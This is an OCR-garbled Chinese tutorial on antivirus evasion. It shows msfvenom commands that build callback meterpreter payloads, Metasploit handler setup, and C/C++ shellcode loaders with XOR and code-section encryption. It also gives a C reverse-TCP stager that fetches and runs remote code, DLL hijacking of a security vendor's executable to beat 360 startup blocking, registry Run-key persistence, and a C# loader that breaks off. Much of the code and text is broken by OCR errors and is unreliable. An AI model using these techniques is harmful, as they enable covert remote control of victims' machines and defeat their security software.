ckuman\Desktop\go-shel lcode> 


AF 





0 内 存 中 没有 内 容 
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总 结 нен E s. 


这 里 我 采用 和 之 前 python 加 载 shellcode 不 同 的 方法 ， 之 前 采用 的 是 创建 一 块 可 读 可 写 可 执行 的 内 
存 然后 把 shellcode 放 进 去 ， 这 次 是 直接 改 存 放 shellcode 的 变量 的 内 存 属性 ， 本 质 上 都 是 改 内 存 
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wi Ж 


免 杀 技术 之 msf 偏 执 模式 
介绍 msf 偏 执 模式 


篇 天 模式 在 面 对 接受 的 请 求 很 多 的 时 候 ， 可 以 有 效 过 滤 筛选 回 连 的 请 求 ， 只 留 下 自己 所 需要 的 。 
同时 因为 其 使 用 了 SSL/TLS 认证 ， 因 此 在 应 对 流量 监控 和 分 析 时 ， 有 很 不 错 的 效果 ， 当 然 也 能 够 


Bypass av(by data stream) 


创建 一 个 SSLITLS 证 书 
在 kal 或 者 其 他 带 有 openssl 的 环境 下 : 


$ openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \ 
-subj "/C=US/ST=Texas/L=Austin/0=Development/CN=green-m.github.io" \ 
-keyout green-m.github.io.key \ 
-out green-m.github.io.crt && \ 
cat green-m.github.io.key green-m.github.io.crt > green-m.github.io.pem && \ 
rm -f green-m.github.io.key green-m.github.io.crt 


你 可 以 把 green-m.github.io 这 个 URL 改 成 任意 你 想 回 连 的 地 址 ， 直 接 指定 相应 IP 也 可 以 。 


:-# openssl req -new -newkey гѕа:4096 -days 365 -nodes -x509 \ 
-subj "/C=US/ST=Texas/L=Austin/0=Development/CN=green-m.github.io" N 
-keyout green-m.github.io.key N 
-out green-m.github.io.crt && \ 
> cat green-m.github.io.key green-m.github.io.crt > green-m.github.io.pem && Ñ 
> rm -f green-m.github.io.key green-m.github.io.crt 
Generating a RSA private key 


g new private key to 'green-m.github.io.key' 
Dd ls 
ta | 


green-m.github.io.pem М 





如 果 你 能 搞 到 一 个 受信 任 的 证 书 颁 发 机 构 签 名 的 SSL/TLS 证 书 ， 那 就 确 堡 了 ， 流 量 直 接 畅通 无 阻 。 


生成 偏执 模式 的 payload 


msfvenom -p windows/meterpreter/reverse winhttps LHOST-green-m.github.io LPORT=4 


> 


通过 过 设置 PayloadUUIDTracking 和 PayloadUUIDName 可 以 在 监听 的 时 候 过 滤 掉 不 需要 的 回 连 请 
求 。 为 了 Bypass av 的 需求 ， 你 还 可 以 生成 shellcode 来 自己 编译 。 
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:~# msfvenom -p windows/meterpreter/reverse winhttps LHOST=green-m.gith 
ub.io LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./green-m.github.io.pem 
StagerVerifySSLCert-true PayloadUUIDName-Green m -f exe -0 ./Green m.exe 
(-І No platform was selected, choosing Msf::Module::Platform::Windows from the p 
ayload 
[-] No arch selected, selecting arch: x86 from the payload 


No encoder or badchars specified, outputting raw payload 
Payload size: 850 bytes 
Final size of exe file: 73802 bytes 
Saved as: ./Green m.exe 
:~# ls 


Desktop go green-m.github.io.pem Public Videos 
Documents Music Sublist3r 
Downloads Green m.exe Pictures Templates 

ic 





如 果 网 络 环境 不 好 ， 你 还 可 以 使 用 stageless 的 payload ，-p 参 数 指定 
windows/meterpreter_reverse_https， 其 他 不 用 修改 。 


监听 偏执 模式 


msfconsole 

use exploit/multi/handler 

set PAYLOAD windows/meterpreter/reverse winhttps 
set LHOST green-m.github.io 

set LPORT 443 

set HandlerSSLCert ./green-m.github.io.pem 

set IgnoreUnknownPayloads true 

set StagerVerifySSLCert true 

set exitonsession false 


run -j -z 
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» use exploit/multi/handler 
5 exploit( ) » set PAYLOAD windows/meterpreter/reverse winhttps 
LOAD => windows/meterpreter/reverse winhttps 
msf5 exploit( ) » set LHOST green-m.github.io 
LHOST => green-m.github.io 
msf5 exploit ( ) > set LPORT 443 
ЭЕТ => 443 
xxploit( ) > set HandlerSSLCert ./green-m.github.io.pem 
2г551Сегї => ./green-m.github.io.pem 
exploit( ) > set IgnoreUnknownPayloads true 
ioreunknownPayloads => true 
msf5 exploit ( ) > set StagerVerifySSLCert true 
staqerverifySSLCert => true 
msf5 exploit( ) > set exitonsession false 
exitonsession => false 
msf5 exploit ( ) > run -j -z 





设置 НапФ1ег551Сеге 和 StagerverifySsiCert 参数 来 使 用 TLS pinning, 
lgnoreUnknownPayloads 接 受 白 名 单 的 payload。 


同上 ，stageless 修改 相应 payload。 
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免 杀 技术 之 生成 shellcode 自 行 编译 


生成 shellcode 自 行 编译 ， 配 合 异 或 加 解密 ， 加 上 不 同 的 编译 器 配合 不 同 的 编译 选项 ， 使 得 生成 的 
exe 文 件 具有 不 同 的 特征 ， 从 而 绕 过 基于 特征 检测 的 杀 软 。 


使 用 msfvenom 或 cs 生成 shelicode 





替换 shellcode 区 域 为 msf 或 者 cs 生成 的 shellcode 即 可 


include 


Include 


using namespace std; 


Паша ан” S 


pragma comment(linker, "/section:.data,RWE") 


/不 显示 窗口 


pragma comment(linker,"/subsystem:Y'windows!" 
lentry:'mainCRTStartupY"") 


pragma comment(linker, "INCREMENTAL:NO") 


unsigned char shellcode[] = 
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| » e8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 

xs 2lxOclxb\xS21x14\x81K721x28 WX fb dal 26x31 din 
ас 3c\x61\x7c\x02\x2c\x20\xc1xcfixOd\x01\xc7\xe2\xf2\x52" 
E 8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 
5: \x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3alx49\x8b\x34\x8b" 
я 1 WdetG1wffxacixci \xcfxOd\xO1\Ke7 a8 weOw75 fe x03" 
Es 8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 
xOc\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 
5bwsbw6lwsewsavslvfweovsfwxsfvsavebvdzveb' 
T 5d\x68\x74\x74\x70\x00\x68\x7 7\x69\x6e\x68\x54\x68\x4c" 
T 6\x07\xfflxd5\x68\x 74\x33\x32\x00\x68\x63\x72\x79\x70" 
| 5 A\X68\x4c\x7 7\x26\x07\xffixd5\x31\xdb\x53\x53\x53\x53\x53" 
X68\x04\x1f\x9d\xbb\xffixd5\x50\x53\x68\xbb\x01\x00\x00\xe8" 
е f\x01\x00\x00\x68\x00\x7 4\x00\x74\x00\x70\x00\x73\x00\x3a" 
x00 2f\x00\x2f\x00\x68\x00\x63\x00\x62\x00\x6c\x00\x6f\x00" 
x6 7\x00\x2e\x00\x78\x00\x7 9\x00\x7alx00\x2f\x00\x61\x00\x49" 
xc 01\x43\x00\x4b\x00\x54\x00\x52\x00\x61\x00\x30\x00\x61\x00" 
\X31\x00\x65\x00\x32\x00\x32\x00\x37\x00\x66\x00\x61\x00\x36" 
X 0\x36\x00\x6a\x00\x51\x00\x58\x00\x41\x00\x4a\x00\x4b\x00" 
i 4\x00\x57\x00\x70\x00\x79\x00\x4a\x00\x76\x00\x77\x00\x5 1." 
X00\x76\x00\x73\x00\x44\x00\x77\x00\x69\x00\x50\x00\x54\x00" 
x A\X00\x32\x00\x6alx00\x4alx00\x2d\x00\x31\x00\x41\x00\x45" 
xc O\x63\x00\x6b\x00\x69\x00\x4e\x00\x4e\x00\x41\x00\x00\x00" 
KB3\XC7\x24\x50\x68\x46\x9b\xLe\xc2\xfflxd5\x68\x00\x01\x80" 
WO 0\x53\x53\x53\x57\x53\x50\x68\x98\x10\xb3\x5b\xff\ixd5\x96" 
ха \xec\x10\x89\xe0\x57\x89\xc7\x5 7\x68\x21\xa7\xOb\x60\xff" 
\xd5\x85\xc0\x74\x4d\x8b\x47\x04\x85\xc0\x74\x2a\x5a\x83\xea" 
Ë 24\x6a\x01\x53\x53\x50\x6alx03\x6alx03\x89\xe0\x83\xec\x0c" 


9\xe7\x57\x50\x52\x8d\x44\x24\x40\xfñx30\x68\xda\xdd\xea" 
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"\x49\xffixd5\x85\xcO\x74\x1e\xeb\xOfx8b\x47\x08\x85\xc0\x74" 
"\X15\x6alx04\x58\x0 L\xc 7\x48\x89\x07\x6alx0c\x5 7\x6alx26\x56" 
"\x68\xd3\x58\x9d\xce\xffxd5\x68\x00\x33\x00\x00\x89\xe0\x6a" 
"\x04\x50\x6alx 1f\xS56\x68\xd3\x58\x9d\xce\xffixdS\x6alxOalx5f” 
"\X53\x53\x53\x53\x53\x53\x56\x68\x95\x58\xbb\x9 L\xffixd5\x85” 
"\xcO\x75\x08\x4fi\x75\xeb\xe8\xc9\x00\x00\x00\x6alx04\x89\xe1” 
"\x6a\x00\x89\xe3\x51\x53\x6a\x4e\x56\x68\x78\x04\x2f\x27\xff" 
"\xd5\x85\xcO\x74\xe3\x6a\x14\x89\xe1\x2b\x21\x89\xe7\x51\x57” 
"\x6alxO3\xffix33\x68\x2d\x6elxad\xc3\xffixd5\x85\xcO\x74\xca" 
"\xe8\x14\x00\x00\x00\x9e\x92\x57\x0f\xa5\x57\x81\x55\x44\x98" 
"\xdO\x5d\x9c\xa2\x20\x85\xaalx8alxb2\x3d\x5b\x6alx04\x59\x89" 
"\xca\x8b\x03\x3b\x07\x0f\x85\xa1l\xff\xff\xff\x01\xd3\x01\xd7" 
"\xe2\xfO\x31\xdb\x53\x56\x68\x05\x88\x9d\x 7O\xffixd5\x85\xcO" 
"\xOf\x84\x88\xff\xff\xff\x6a\x40\x68\x00\x10\x00\x00\xX68\x00" 
"\xO0\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89" 
"\xe7\x57\x68\xX00\x20\x00\x00\x53\x56\x68\x6c\x29\x24\x7e\xff" 
"\xd5\x85\xcO\xOf\x84\x58\xff\xff\xffix8b\x07\x01\xc3\x85\xc0O" 
"\x75\xe1l\x58\xc3\x5f\xe8\x9d\xfe\xff\xff\x68\x00\x63\x00\x62" 
"\x00\x6c\x00\x6f\x00\x67\x00\x2e\x00\x78\x00\x79\x00\x7a\x00" 
"\x00\x00\xbb\xf0\xb5\xa2\x56\x6alxO0\x53\xffixdd"; 

// the key to xor 

unsigned char key[] = “\xcc\Oxfa\Ox1f\0x3d"; 

II encode shellcode 


void encode() 


{ 
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2 shellcode[i] = shellcode[i] ^ key[i % sizeof(key)]; 


(int i = 0;i < (sizeof(shellcode) - 1);i++) 


shellcode[i] = shellcode[i] ^ key[i % sizeof(key)]; 
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使 用 vs 进行 编译 


5 


w 





- » -а ` 
° " ; 
WindowsProlectlepp 9 x y 
Жк WindowsProject1 ， (£D . 3 
windows, h * 
3 в €etdio.h E 
using namespace std; 
ата? 3 DE: Eo 
(linker, "/sectión:.data, WE") 
4 
(linker, entry: “maynCRIStartupy ") 
(linker, `/INC 
unsigned char shellcode[] = 
100% + 5 жа 516 3262 BM сл 





Ёл ER : teo X % 
LWindorsfrojecti. ob) : warming LNK407S B “ /EDITANDCONTINUE'" "ER" INCREMENTAL MO" WDD 
lWindowsProjectl vexpro) -> + \Users\Adninistrator\sourcelrepos\WindowsFreject! \Debug\WindowsFroject exe 


рияны “WindowsProjectl] vexproj" ВУНЕ o — 





=== 生成 成功 1 o О. RH 0 q В ó 个 === 





1639 


免 杀 技术 之 代码 加 密 
方法 原理 : 


直面 的 代码 加 密 了 程序 的 代码 段 和 数据 段 ， 从 而 绕 过 杀 软 


使 用 msfvenom 或 cs 生成 shellcode 





蔡 换 shellcode 区 域 为 msf 或 者 cs 生成 的 shellcode 即 可 
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#include «Windows.h» -— i v > * 


/* Declare new sections to store encrypted code and shellcode data *ў 
#pragma section(".code",execute, read, write) 

Яргадта section(".codedata", read, write) 

// Merge .codedata into .code (which will be encrypted by cryptor) 


#pragma comment(linker, "/MERGE: .codedata=.code") 





// Declare .code as Executable, Read, Write section, this is necessary so applic 


#pragma comment(linker, /SECTION: .code, ERW") 


// This will put all following constants and global variables in .codedata segme 
#pragma data seg(".codedata") 

&pragma const. seg(".codedata") 

// From here executable code will go in .code section 


#pragma code seg(".code") 


/* 
* windows/meterpreter/bind tcp - 298 bytes (stage 1) 
* http://www.metasploit.com 
* VERBOSE-false, LPORT=80, RHOST-, EnableStageEncoding-false, 
* PrependMigrate-false, EXITFUNC-process, AutoLoadStdapi-true, 
* InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo-true, 
* EnableUnicodeEncoding-true 


"A 
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пей char buf[] = | 

d —— # 
8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" 
^ 52NX0Cc NX8bNX52NX14NX8bNx72NX28NX0f Nxb7Nx4aNX26NX 31 NXf f " 
NE  ас\ухзс\хвл\хтс\хәз\хәс\хәе\хс1\хсг\хөай\хәт\хст\хе2" 
ө X52NX57NX8bNX52NX10NX8bNx42NX3C X01 NXdONX8bNXx40NX 78NXB5" 
x74\x4a\x01\xdO\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" 
3c\x49\x8b\x34\x8b\xO1\xd6\x34\xff\x31\xcO\xac\xci\xcf\x0d" 
хөт\хст\хзв\хео\хт5\х#4\хөз\хта\хғв\хзЬ\хта\х24\х75\хе2\х58" 
\x58\xX24\x01\xd3\x66\x8b\x0C\x4b\x8b\x58\xX1C\x01\xd3\x8b" 
Nx8bNx01 VxdONXx89Nx44NX24NX24NX5bNXx5bNx61NXx59Nx5a Nx 51Nxf f" 
\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\xX00\x00\x68" 
TINXT3NX32NX5BfNX5ANX68NXACNX77NX26NX07NXf f NXXd5NXb8NX90NXx01" 
00\x00\xX29\xc4\x54\x50\x68\x29\x80\x6bD\ xOO\xfF\xd5\x50\x50" 
| 50\x50\x40\x50\x40\x50\x68\xea\xOf \xdf\xeO\xf f Nxd5Nx97NXx31" 
'\xdb\x53\x68\x02\x00\x00\x50\x89\xe6\x6a\x10\x56\x57\x68\xC2" 
отете \xd5\x53\x57\x68\xb7\xeo\x38\xff\xff\xds\x53" 
W\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" 
X61NxffNxd5Nx6aNx00Nx6aNx04Nx56Nx57Nx68Nx02Nxd9Nxc8Nx5fNxff" 
"\хаз\хвь\хзв\хба\хав\х&в\хөө\хїб\хөв\хв\х5б\хба\х®ө\х68\х58” 
"\xa4\x53\xe5\ xf f\xd5\x93\X53\x6a\x90\X56\X53\X57\X68\x02\xd9" 


WM\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"; 
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int shellLaunch() v * 


1 

/* Declare pointer on function */ 
ant (func)! (); 
/* Cast shellcode into function */ 
func = (int (7) (Y) buf; 
/* Call function (Execute shellcode) */ 
(int) (*func) (); 

} 


// .stub SECTION , the following part is not encrypted. 
#pragma section(".stub", execute, read, write) 

#pragma code seg(".stub") 

#pragma section(".stubdata", read, write) 

// Merge .stubdata into .stub (decryption part) 


#pragma comment(linker,"/MERGE: .stubdata=.stub") 


// This will put out strings and global variables in .stubdata segment 
#pragma data seg(".stubdata") 
#pragma const seg(".stubdata") 


// Executable code will go in .stub section 
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| seg(" . stub") 
\ - жі аі -. % > 


e CODE BASE ADDRESS 0х15151515 


ne CODE SIZE 0x14141414 


ecrypt .code block encrypted by cryptor */ 
їп this function do not declare array to avoid security cookies checks (see 上 
Or disable security check (GS- option) on prog compilation */ 


ryptCodeSection() 


unsigned char *ptr; 
long int i; 

long int nbytes; 
DWORD patience; 


DWORD codeAddr; 

aint cpt = 0; 

BYTE key[] = { гарахаа ыр де tl QE 
int keyLength = 8; 


ptr = (unsigned char *)CODE_BASE_ADDRESS; 


nbytes = CODE_SIZE; 
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f 


// Decrypt code segment 


for( i= 0 ; і < nbytes ; i++ ) 





1 
ptr[i]-ptr[i]^key[cpt]; 
cpt = cpt + i; 
if(cpt == keyLength) 
cpt = 0; 
} 
геїигп; 
j 
int main() 
( 
decryptCodeSection(); 
shellLaunch(); /* Call function which executes shellcode now that it is c 
return 0; 
} 
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编译 以 上 代码 











bot LE ж 73 - 
` (ERES) * . 
! * 
return; ж 
nain() 
decrypti естіоп ОО; 
shellLaunchQ. е hellcode n hat i ectyt * 
return 0; 
б ARSE 4 , 15 #51 жш CRLF 
“жж 
BS): 生成 tà = ға 
已 自动 生成 МЕ. test2， NE Debug Win32 ------ 


AAdainistratorNsource repos VtestZ testZWtest2. c(4, 4T): warning £4330. Елен “write” ET code”) 
NAdmini strator\source\repos\test2\test2\test2. c(B3, 48). warning C4330 BORE “arite” (BFH “stub” ) 
МА алі ті strator\source\repos\test2\test2\test2 el58 11) warning C4101 “patience”， 未 引用 的 局 部 变量 
'sAAdsinistrstor!sourcelrepositest2itestZ M test2 c(B9,11) warning C4101: “codeAddr” 未 引用 的 局 部 交 旦 
\Admini strator tsourcetreposttest2itest2itest2, с (59). warning C4716 “shellLaunch” - 必须 返回 一 个 值 
1 warning LNK4254: 58% codedata" C0000040) 合 并 到 县 有 不 同 特性 的 "cods” (60000040) 
ej -> C Wsers Adninistrator \source \repos\test2\Debugitest2 exe 
RME “test? vexproj" ° 
IN mM TIL 
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免 杀 技术 之 使 用 c 实 现 meterpreter 功 能 


使 用 c 实 现 meterpreter 功 能 ， 代 码 中 不 包含 任何 的 shellcode ， 从 而 绕 过 检测 

下 面 的 代码 用 c 实 现 meterpreter reverse_tcp， 无 需 shellcode， 仅 适用 msf， 直 接 编译 即 可 
使 用 方法 : 

文件 名 .exe ip port 
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comment(lib,"ws2 32.11р") 


始 化 INIT socket 


WSACleanup(); 


exit (1); 


punt(SOCKET my socket, char* 
E printf("Sorry : %sNn", error); 
.. closesocket(my. socket); 


E WSACleanup(); 


exit(1); 


comment(lib, "Advapi32.lib") 


error) { 
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/* 尝试 从 套 接 字 接收 所 有 请 求 的 数据 。 */ 


int recv all(SOCKET my socket, void* buffer, int len) { 


int tret 0; 
int nret - 0; 
void* startb - buffer; 
char* tb - (char*)startb; 
while (tret < len) { 
nret = recv(my_socket, tb, len - tret, 0); 


tb += nret; 


tret += nret; 


if (nret == SOCKET ERROR) 


punt(my socket, "Could not receive data"); 





return tret; 


/* 建立 与 主机 的 连接 : 端口 */ 
SOCKET my connect(char* targetip, int port) ( 
struct hostent* target; 


struct sockaddr in sock; 
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my socket; 
— | .-4 ”` ?) ш 


ШП Е */ 


ocket = socket(AF INET, SOCK STREAM, 0); 


arget = gethostbyname(targetip); 
if (target == NULL) 


punt(my socket, "[-] Could not get target"); 


-o/* жыш */ 
if (connect(my socket, (struct sockaddr*) & sock, sizeof(sock))) 


punt(my socket, "[-] Could not connect to target"); 


return my socket; 
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int main(int argc, char* argv[]) 5 
ULONG32 size; 
char* buffer; 
// 创 建 函 数 指针 ， 方 便 XX00 


void (*function)(); 





winsock init(); // 套 接 字 初 始 化 
// 获 取 参 数 ， 这 里 随便 写 ， 接 不 接收 无 所 谓 ， 主 要 是 传递 远程 主机 IP 和 端口 
// 这 个 可 以 事先 定义 好 
if агас = SI f 
printf("%s [host] [port] ^ ^ Nn", argv[9]); 


exit(1); 


/* 连 接 到 处 理 程序 ， 也 就 是 远程 主机 */ 


SOCKET my socket = my connect(argv[1], atoi(argv[2])); 


/* 读 取 4 字 节 长 度 
* 这 里 是 meterpreter 第 一 次 发 送 过 来 的 
*4 字 节 缓 冲 区 大 小 2E840D90， 大 小 可 能 会 有 所 不 同 , 当然 也 可 以 自己 丢弃 ， 自 己 定义 一 个 大 小 


Z 
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/* 分配 一 个 缓冲 区 RWX buffer */ 
buffer = (char*)VirtualAlloc(0, size + 5, MEM COMMIT, PAGE EXECUTE READWRITE 
if (buffer == NULL) 


punt(my socket, "could not alloc buffer\n"); 


3 /* 把 我 们 的 socket 里 的 值 复制 到 缓冲 区 中 去 */ 


P memcpy(buffer + 1, &my socket, 4); 


/* 读 取 字 节 到 缓冲 区 


“这 里 就 循环 接收 DLL 数据 ， 直 到 接收 完毕 
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тА 
* 


count - recv all(my socket, buffer > 5, size); 


/* 将 缓冲 区 作为 函数 并 调用 它 。 

* 这 里 可 以 看 作 是 shellcode 的 装载 ， 

* 因为 这 本 身 是 一 个 DLL 装 载 器 ， 完 成 使 命 ， 控 制 权 交 给 DLL， 

+ 但 本 身 不 退出 ， 除 非 迁移 进程 ， 靠 DLL 里 函数 ，DLL 在 DLLMain 里 是 循环 接收 指令 的 ， 直 到 遇 到 退出 
* (void (*)())buffer 的 这 种 用 法 经 常 出 现在 shellcode 中 

27 

function - (void (*)())buffer; 

function(); 


return 0; 





b 
SAN im bIn:- 
编译 以 上 源 代码 : 
x ж) Project! £ecE - © main(int ағас, char * argv(p 
> + 
m 1 0! 
ii Š 
( tartup(MAKEWORD(2, 2), & ) <0) 1 
ee t£( - .dill of da ) 
P. mup ( 
(1) 
1 
) I 
( ry y i 
(Sorry : Xs ) 
«C ) 
ipo 
(1) — 
} 
житежен -і5 ж Ее CREF 
vx 
= % 
1 vexproj -> C MisersVAdeinistratorisourceWrepos WrojectlMebugMrojecti exe 
н = 生成 成 功 1 о ARO 个 ， 最 新 0 个 ， 跳 过 0 个 ========== A. 


启动 msf 监 听 : 
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root @kali: ~ ooo 
File Edit View Search Terminal Help 


( 1914 exploits - 1074 auxiliary - 330 post 
=[ 556 payloads - 45 encoders - 10 пор 
f 


4 evasion 


f5 > use exploit/multi/handler 
msf5 exploit ( ) > set PAYLOAD windows/meterpreter/reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 

fS exploit( )» set LHOST 192.168.82.131 

192.168.82.131 
exploit( ) > set LPORT 5555 
ORT => 5555 
fS exploit ( ) > run 


tarted reverse TCP handler on 192.168.82.131:5555 





目标 主机 执行 程序 : 
ШЕ Administrator: C:\Windows\system32\cmd.exe - Projectl.exe 192.168.82.131 5555 езт) | 


Tunnel adapter isatap.localdomain: 


Media State ...........: Media disconnected 
Connect ion~specific DNS Suffix . : lecaldomain 


Users\Adnministrator>ed C:\Users\fAdministrator\source\re pos\Projecti\Debug\ 


\Users\fAdninistrator\source\re pos \Projecti\Debug>Projecti.exe 192.168.82.131 5 


er 
yD 


sorry : [-] Could not connect to target 


(44) sers Administrator\source\repos\Project1\Debug>Project1 «exe 192.168.82.131 4 


92.168.82.131 5 


IU 
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root @kali: ~ 2 © © 


File Edit View Search Terminal Help 


Software Loopback Interface 1 
00:00:00:00:00:00 
: 4294967295 
IPv4 Address : 127.0.0.1 
IPv4 Netmask : 255.0.0.0 
IPv6 Address : ::1 Y 
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff 


Interface 11 


Intel(R) PRO/1000 MT Network Connection 
00:50:56:31:ad:b6 
: 1566 
IPv4 Address : 192.168.82.137 
IPv4 Netmask : 255.255. 255.0 
IPv6 Address : fe80::3c67:4162: f2ce:3104 
IPv6 Netmask : ffff:ffff:ffff:ffff: 


Microsoft ISATAP Adapter 
00:00:00:00:00:00 
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T 杀 过 360 开 机 启动 拦截 


释 ! ! ! ! 此 办 法 不 支持 win10，w 


in10 需 要 穿插 过 UAC 的 代码 
云 查 杀 引 擎 
”启发 式 引 擎 
| овхыжазжаа 


2 QVM FAISSE 


581 小 红 伞 本 地 引擎 еш 


不 多 说 ， 先 过 免 亲 ， 要 不 然 一 切 都 是 白搭 








Dr 


3 文件 ， 找 大 厂商 ， 我 就 拿 天 融 信 终 端 威胁 防御 系统 下 手 ! 
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以 创新 的 杀毒 技术 Jof 








GpsecMain.exe - EHRE % е. 


: |" 
© “ла | 
| 





6%” psecMain 19/68/23 
缺 什么 ЖА 么 ， 然后 我 把 名 字 改 成 天 融 信 言 就 变 成 下 面 这 种 情况 ! 


api-ms-win-crt-runtime-l1-1-0.dil 
DuiLib.dll 
jansson.dll 
jansson.dil.bak 
libcurl.dll 
libxsse.dll 
mfc140u.dll 
mfc140ud.dll 
sqlite.dll 
TopsecComm.dll 
TopsecDB.dll 
uactmon.dll 
upgrade.dll 


usysdiag.dll 


: H i 
D 


- 
94 


选取 一 个 DLL, 用 PETools 打 开 
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© api-ms-win-crt-runtime-11-1-5.dii 
шат Duitib dll 
ГЕ janssendl 
jarsscn dh bak 
ТЕЗІ 
/ lidesse, 
т1л! 
"&14быа.д 
* жүйесі 
- z TopsecComm.dil 
) яву 
ES wm + "gs 













pis 


вт 


аера files (z86)X3600 360vaf — OO00ASC 

esp files We) DVI сно 

an Tale Process) 00000680 š * 
HEIN Otoslsipatosi бооп иан 

cm ней E wa 

























- женл MTS >: пт om (sm us 
ABSMRINB2OMelsgetedrgpeteleWe 00400000 00064000 s 0000 #4, 00000100 
\eandows\syzwor€4 int 41 ттан) — DOl80000 vote at 

ays orb Akaroa 32 dll тихо 00100000 xa 





odo 

елинде sew oO ker albas d1 ТБАРОО00 00046000 

fevtwondows\vinsss\n85_microzoft vindows cameo 74890000 00191000 
indows\ayavovbt\anvert Q) торо — G00NCOQQ 













ЕТІП sa 
чөй ex 
mun ex 
тымен в 


тз. & BM Yarns Dank Н УНШ, Forewr der Chair QM 
юг nl — 04 00000000 690000000 
шит dn 00023240 00000000 0000000 


Hires Tini 


00010003 
00010000 















тоқы Thak Ma Thnk M Thnk H 


EystosPuncta 2036 0025240 — 000020) 0022804 





你 添加 的 DLL 名 称 和 API 名 称 ! 添加 保存 即 可 ! 然后 现在 我 们 来 写 代码 ! 
ZEMA 





打开 VS2019 创 建 DLL 
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ima DLL. IAA ESS BSA eS š ж ? 
#include "pch.h" 
#include <windows.h> 





, 


#include <iostream> 


extern "C" _ declspec(dllexport) LP 








witch (ul reason for call) 


case DLL PROCESS ATTACH: 
ise DLL. THREAD. ATTACH: 

case DLL THREAD. DETACH: 

case DLL PROCESS. DETACH: 


Бера • 
OUr CAK, 





» 

char path[MAX PATH]; 

GetCurrentDirectory(MAX PATH, path); 
«« path; 


(path, "SNArvin.exe"); 
HKEY һКеу; 
LPCTSTR lpRun - "SOF 





long lRet = RegOpenKeyEx(HKEY LOCAL MACHINE, lpRun, ©, KEY WRITE, &hKey); 
if (lRet == ERROR SUCCESS) 
( 

char pFileName[MAX PATH] = { © y; 

DWORD dwRet - GetModuleFileName( , pFileName, MAX PATH); 

lRet = RegSetValueEx(hKey, “Arvin”, ©, REG 52, (BYTE*)pFileName, dwRet); 


RegCloseKey(hKey) ; 
if (lRet != ERROR SUCCESS) 
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WinExec(path, SW SHOWMAXIMIZED); 


) 


Wn7 下 需要 做 一 下 设置 改 成 MTd 


Wi а 


#B(C): ”活动 (Release) 


4 БЕЗ 
常规 





浏览 信息 启用 字符 串 池 


EIT / Мак 


-vv vv 
54 
J; 
Jii 
Ш 





允许 编译 器 在 执行 i ee 
一 种 称 为 字符 串 池 








E(Pk ”活动 (Win32) 
是 (/Gy) 
未 设置 
精度 (/fp:precise 
已 禁用 
在 程序 陕 像 和 内 存 中 创建 相同 字符 只 的 单个 只 读 


‚ДОЛ. /O2 #0 


/Z\ Bz 





动 设置 /GF 选项 。 


确 


hit 


编 EE Lern. DLL( 这 里 是 刚刚 添加 导入 函数 的 DLL 名 称 ) 


此 电脑 ， 本 地 磁盘 (C) ， 用 户 


名 称 


GÀ DII .expl 


B РДЕ 


B ДЕ Y 
ЕЗ DI lib 


„РДЕ 


把 我 们 的 已 经 免 杀 过 的 木马 和 Arvin.dll 至 


source 


ШШ 


repos > DIN 


修改 日 期 


2019/12/30 15:54 
2019/12/30 15:54 
2019/12/30 15:54 
2019/12/26 17:26 
2019/12/30 15:54 


| 提取 的 天 融 信 的 文件 夹 中 ! 
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Release 


Exports Library F... 
IOBJ 文件 
IPDB 文件 
Object File Library 
Program Debug... 


副本 ， 


配置 管理 器 (O) 


从 而 生成 较 小 的 程 F 


1 KB 

397 KB 
75 KB 

2 KB 
6,388 KB 





全 程 无 提示 上 线 成 功 ! 










agimi-vincntnuntime-i1- 1-0 d 
Avin dl 








Оше di 
ж lanarena 
Bse 
x= 
хе 
LI 















I 
частое di 
upgrade. di 
wtysdiag di 9 жене 
a || |. 
|Coba Strike View Attacks Reporting Help 
emnt Sa pran 
pmotmzoemst»ucoenoooamt!e ; 
extemal mera = user computer note pa jas 
ЯР 6t'6247 b 4c 1 VAN-BOKRUS 239% 9 
Ж z i WiN-BGKRUS E 10s 





我 把 软件 名 字 改 成 了 英文 ， 因 为 中 文 会 出 问题 在 注册 表 ， 导 致 不 启动 了 啊 ! | ! 于 是 我 换个 名 字 改 
成 英文 




















Run ^п 名 称 类 型 ша 
REG. SZ EB 
S Ее. eh REG 52 "CAProgram Files (x86)\360\360Safe\safemon... 
数值 名 称 QD REG 52 CaUsersAdministrator Desktop 222 t8 e... 





Árvin 
О 





StructuredQuery | 
zi Syncmgr 
SysPrepTapi 
Telephony 
ТһетеМападег 
Themes 


Uninstall 
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用 c# 实 现 简单 的 分 离 兔 杀 oM 


3 多 杀毒 软件 都 会 对 内 存 进行 扫描 ， 如 发 现存 在 明显 的 shellcode 特 征 ， 则 会 被 杀毒 软件 拦截 。 
我 们 可 以 党 试 使 用 白 + 黑 的 方式 绕 过 杀 软 ， 即 shellcode_loader+shellcode 的 方式 执行 


codes 


(01: 简单 的 shellcode 加 载 
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using System; ^ bow 
using System.Runtime.InteropServices; 
namespace TCPMeterpreterProcess 


( 
class Program 
t 
static void Main(string[] args) 
t 
// native function's compiled code 
// generated with metasploit 
byte[] shellcode = new byte[] { 
}; 


UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 

MEM COMMIT, PAGE EXECUTE READWRITE); 
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); 
IntPtr hThread - IntPtr.Zero; 
UInt32 threadId - 0; 
// prepare data 
IntPtr pinfo - IntPtr.Zero; 
// execute native code 
